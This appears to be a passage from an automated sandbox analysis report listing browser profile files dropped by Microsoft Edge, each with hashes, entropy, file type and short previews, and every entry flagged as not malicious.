                                                                                                                                                                                                                                                                                    SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekq4FMW:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dhZ
                                                                                                                                                                                                                                                                                    MD5:463A6FD131A0E4F768F81184C74BF35D
                                                                                                                                                                                                                                                                                    SHA1:C0109555400E5D379DBC5B06DA21E6A1429009A6
                                                                                                                                                                                                                                                                                    SHA-256:08A6643B285351A5F290E2B32A7C9DAEB92B70E86E889B5BB391FCB7B77E01F1
                                                                                                                                                                                                                                                                                    SHA-512:EA61304FD455A0EA4657FBF704CD6DFC6167E265A0199E0022D472AB9EAF0C69D343631F0DB945F451A3C62DA0B75EC4A33B8648FB708794D5CD6AF8FD1B50A0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):189113
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.3879873834484115
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:hwQTre3UoWwinb7lK4mL/fBTr6fmv0khcly9JULUxNLk:fsWwinlUL/pX6ZkSKk
                                                                                                                                                                                                                                                                                    MD5:94B1460E19D5583E130B7A253031D195
                                                                                                                                                                                                                                                                                    SHA1:A799638F706878CDB4BCA003E0DA53DDBA057B6D
                                                                                                                                                                                                                                                                                    SHA-256:B7B8DFC416F6A63C9855A59085B6155ADBC589EFEC263E3AB060692666000BD5
                                                                                                                                                                                                                                                                                    SHA-512:E5F90EFBD3B18F00D611D238136E186C792413B65F92725CF306DB12E3D32F4155138815D65F80CE57D2B0CF8EF34B3A820870C569C03920F3F6C493F96F9D8F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:0\r..m..................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Z3e59Xl/lYV/lxE4ltQ3Don:Q5NYWoWTo
                                                                                                                                                                                                                                                                                    MD5:57EF9534EC8D199C32A98A5182FB479F
                                                                                                                                                                                                                                                                                    SHA1:56ACD2E92980033695F9E0980FD4CD523533F77D
                                                                                                                                                                                                                                                                                    SHA-256:A3FA111DF4290D416CB94E109E459F14DE6B008067356842752D6C8A87CA6F6F
                                                                                                                                                                                                                                                                                    SHA-512:18541578E18A859358A9B26A152786D68996B14B3E112BBD535E881196442DB90F05B61C7FCB9C4D5FCD8A01506E1436F2C92FBD0A973412F3CFB824E39B8663
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:@...l.;Poy retne.........................X....,...................../.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Z3e59Xl/lYV/lxE4ltQ3Don:Q5NYWoWTo
                                                                                                                                                                                                                                                                                    MD5:57EF9534EC8D199C32A98A5182FB479F
                                                                                                                                                                                                                                                                                    SHA1:56ACD2E92980033695F9E0980FD4CD523533F77D
                                                                                                                                                                                                                                                                                    SHA-256:A3FA111DF4290D416CB94E109E459F14DE6B008067356842752D6C8A87CA6F6F
                                                                                                                                                                                                                                                                                    SHA-512:18541578E18A859358A9B26A152786D68996B14B3E112BBD535E881196442DB90F05B61C7FCB9C4D5FCD8A01506E1436F2C92FBD0A973412F3CFB824E39B8663
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:@...l.;Poy retne.........................X....,...................../.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Z3e59Xl/lYV/lxE4ltQ3Don:Q5NYWoWTo
                                                                                                                                                                                                                                                                                    MD5:57EF9534EC8D199C32A98A5182FB479F
                                                                                                                                                                                                                                                                                    SHA1:56ACD2E92980033695F9E0980FD4CD523533F77D
                                                                                                                                                                                                                                                                                    SHA-256:A3FA111DF4290D416CB94E109E459F14DE6B008067356842752D6C8A87CA6F6F
                                                                                                                                                                                                                                                                                    SHA-512:18541578E18A859358A9B26A152786D68996B14B3E112BBD535E881196442DB90F05B61C7FCB9C4D5FCD8A01506E1436F2C92FBD0A973412F3CFB824E39B8663
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:@...l.;Poy retne.........................X....,...................../.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):5651
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.3964310524107555
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:zIG93Ebqdpy0G9Xp+at+ViVYokE6Ll9iSrK17qcv4ZAS3s6h3:/EGdQ9Xp+8KiuDbLl9iSrKZqyMt3x3
                                                                                                                                                                                                                                                                                    MD5:F5835788E7D38BFF5CE5AAB6BBAE6477
                                                                                                                                                                                                                                                                                    SHA1:72C87BFDE2518F5C3AB29E712A646A7DE0E7E99F
                                                                                                                                                                                                                                                                                    SHA-256:84F7D06CE754A0A7CA0801C88D2E659580613E176D1E0D9392F102247E806097
                                                                                                                                                                                                                                                                                    SHA-512:781DEB4B206C396CD5CC2B1EEA8A9A2C257E9172DF6E1D1A0CA03BB028293120AABE23C7F49262DF4768BE77AF1A9BCD15BDC0100923A69D93669A96F53AC5D9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.083069260025029
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iUU49yq2P923oH+TcwtrQMxIFUt8dGVI1Zmw+dIxRkwO923oH+TcwtrQMFLJ:iUUv4YebCFUt8dGC1/+dIn5LYebtJ
                                                                                                                                                                                                                                                                                    MD5:2016712A91DD94C8F8069DFBBAA927EF
                                                                                                                                                                                                                                                                                    SHA1:F3188786932E64B288DC3D554643D4854C2D3848
                                                                                                                                                                                                                                                                                    SHA-256:708BB40C799541C6E41320EB5481E1AC46F5682DBE9A0C1CEF3CDA3028049C77
                                                                                                                                                                                                                                                                                    SHA-512:FBB9F73DEFC87A1BA5205AAB20069D643667F498884D23C84E9CDBE769748B71103B6532974E6192D530B6FDE72DBEE06DDB768FB1862D5C2C6D43B21A5B5D79
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.801 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-08:47:12.802 1070 Recovering log #3.2024/12/27-08:47:12.805 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1443
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.851401501332651
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:3mrhs4cS2KeyektpsAF4unx/gtLp3X2amEtG1ChqGi0XQKkOAM4:3mNs4mozFGLp2FEkChlPAHOp
                                                                                                                                                                                                                                                                                    MD5:D541BED773913D111DE0D3EB142DA83C
                                                                                                                                                                                                                                                                                    SHA1:5EBAD332BE50B817DFCADE4E02912951A9E0F295
                                                                                                                                                                                                                                                                                    SHA-256:AB6DD0DCD5C1E459D58A59A6CC47EB3C4BC2F0BE4DE07CD0638526605627FF5C
                                                                                                                                                                                                                                                                                    SHA-512:C6042FE7AC9F052813E87792392F1FC76EFF82B0DB302ED8245328C0DAAAB5743722E151860C083C2C8EF29B01BE2EC7FD829927493FFBE7D1643F001A00A95A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                    MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                    SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                    SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                    SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):349
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.141173486590786
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLjXYVq2P923oH+Tcwt7Uh2ghZIFUt8doLjXYgZmw+doLjXYIkwO923oH+Tcwts:i6IVv4YebIhHh2FUt8d6Ig/+d6II5LYz
                                                                                                                                                                                                                                                                                    MD5:D69A88FD269C027E6E01018237510C5C
                                                                                                                                                                                                                                                                                    SHA1:9A5C3B51525F1AD073AEA3CFADAA8E8F880D641A
                                                                                                                                                                                                                                                                                    SHA-256:70CB12898C6B4F74BAD519DA672E6B9A14775C622DF3036A433D501FD193BF79
                                                                                                                                                                                                                                                                                    SHA-512:16BA76172851D47E67CBF84689A4A6ECBEDDFDBF11FE2C419309FC006E796C8E42235228C5DC7E2F89507809F5497602BB339A48A8A55FDA16F035DB10A294FC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.758 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-08:47:11.758 440 Recovering log #3.2024/12/27-08:47:11.758 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221097062353496
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:ieWv4YebvqBQFUt8dey/+de+P5LYebvqBvJ:T04YebvZg8MQ+BLYebvk
                                                                                                                                                                                                                                                                                    MD5:0ECE0007BC8E33E3152A6FB60B09B712
                                                                                                                                                                                                                                                                                    SHA1:81E4A7F35E70AE0DC34743BE5EED13C43499A648
                                                                                                                                                                                                                                                                                    SHA-256:59F1376C3191077CCADC9CC1EF68A6110AC55F43718FFAC8ED772854A3A6659A
                                                                                                                                                                                                                                                                                    SHA-512:D44D902389058C0A93D9A4E16A4B5960B590819F7690B124B3D47B9243498E2DF78F396CE3948C30273C362AA9F216AEB89F507A0E23C36FAC63A7B171D4B081
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.810 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-08:47:12.811 8f4 Recovering log #3.2024/12/27-08:47:12.815 8f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221097062353496
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:ieWv4YebvqBQFUt8dey/+de+P5LYebvqBvJ:T04YebvZg8MQ+BLYebvk
                                                                                                                                                                                                                                                                                    MD5:0ECE0007BC8E33E3152A6FB60B09B712
                                                                                                                                                                                                                                                                                    SHA1:81E4A7F35E70AE0DC34743BE5EED13C43499A648
                                                                                                                                                                                                                                                                                    SHA-256:59F1376C3191077CCADC9CC1EF68A6110AC55F43718FFAC8ED772854A3A6659A
                                                                                                                                                                                                                                                                                    SHA-512:D44D902389058C0A93D9A4E16A4B5960B590819F7690B124B3D47B9243498E2DF78F396CE3948C30273C362AA9F216AEB89F507A0E23C36FAC63A7B171D4B081
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.810 8f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-08:47:12.811 8f4 Recovering log #3.2024/12/27-08:47:12.815 8f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                    MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                    SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                    SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                    SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                    MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                    SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                    SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                    SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                    MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                    SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                    SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                    SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                    MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                    SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                    SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                    SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.24834078849334
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:iwSAv4YebvqBZFUt8drC1/+dP5LYebvqBaJ:Iy4Yebvyg8pCkLYebvL
                                                                                                                                                                                                                                                                                    MD5:3AB618A29B0D9FB06D1CC43CD7790AAB
                                                                                                                                                                                                                                                                                    SHA1:007EF83B3528F3048E13EB58ED77C656F9B124A1
                                                                                                                                                                                                                                                                                    SHA-256:83B38F610D26BAB9A9453C4BDBD85814FC1A609924D4A7778708F9070D79E232
